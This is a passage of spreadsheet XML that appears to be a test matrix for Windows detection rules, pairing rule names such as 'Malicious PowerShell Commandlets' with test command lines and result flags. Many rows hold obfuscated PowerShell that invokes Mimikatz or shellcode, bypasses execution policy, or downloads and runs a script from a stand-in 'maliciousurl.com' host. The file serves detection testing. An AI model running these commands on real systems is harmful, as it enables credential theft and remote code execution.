          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D131" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E131" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="36" t="n"/>
      <c r="J131" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C132" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D132" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E132" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="43" t="n"/>
      <c r="J132" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C133" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D133" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E133" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="43" t="n"/>
      <c r="J133" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C134" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D134" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E134" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="36" t="n"/>
      <c r="J134" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C135" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D135" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E135" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="36" t="n"/>
      <c r="J135" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C136" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D136" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E136" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="36" t="n"/>
      <c r="J136" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
      <c r="B137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C137" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D137" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E137" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="36" t="n"/>
      <c r="J137" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C138" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D138" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E138" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H138" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="36" t="n"/>
      <c r="J138" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C139" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D139" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E139" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="36" t="n"/>
      <c r="J139" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="n"/>
      <c r="B140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C140" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D140" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E140" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="36" t="n"/>
      <c r="J140" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="n"/>
      <c r="B141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C141" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D141" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E141" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="36" t="n"/>
      <c r="J141" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="n"/>
      <c r="B142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C142" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D142" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E142" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="36" t="n"/>
      <c r="J142" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C143" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D143" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E143" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="43" t="n"/>
      <c r="J143" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="36" t="n"/>
      <c r="B144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C144" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D144" s="36" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E144" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set str1=gather &amp; set str2=NetworkInfo.vbs &amp; call wscript.exe C:\Windows\System32\%str1%%str2%"</t>
        </is>
      </c>
      <c r="F144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="43" t="n"/>
      <c r="J144" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K144" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C145" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D145" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E145" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="43" t="n"/>
      <c r="J145" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C146" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D146" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E146" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="43" t="n"/>
      <c r="J146" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B147" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C147" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D147" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E147" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="36" t="n"/>
      <c r="J147" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C148" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D148" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E148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148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="36" t="n"/>
      <c r="J148" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C149" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D149" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E149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149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="36" t="n"/>
      <c r="J149" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C150" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D150" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E150" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="36" t="n"/>
      <c r="J150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C151" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D151" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E151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151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="43" t="n"/>
      <c r="J151" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C152" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D152" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E152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152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="36" t="n"/>
      <c r="J152" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C153" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D153" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E153" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="36" t="n"/>
      <c r="J153" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B154" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C154" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D154" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E154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154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="36" t="n"/>
      <c r="J154" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C155" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D155" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E155" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="36" t="n"/>
      <c r="J155" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C156" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D156" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E156" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="43" t="n"/>
      <c r="J156" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C157" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D157" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E157" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="43" t="n"/>
      <c r="J157" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C158" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D158" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E158" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="36" t="n"/>
      <c r="J158" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C159" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D159" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E159" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="36" t="n"/>
      <c r="J159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B160" s="36" t="inlineStr">
        <is>
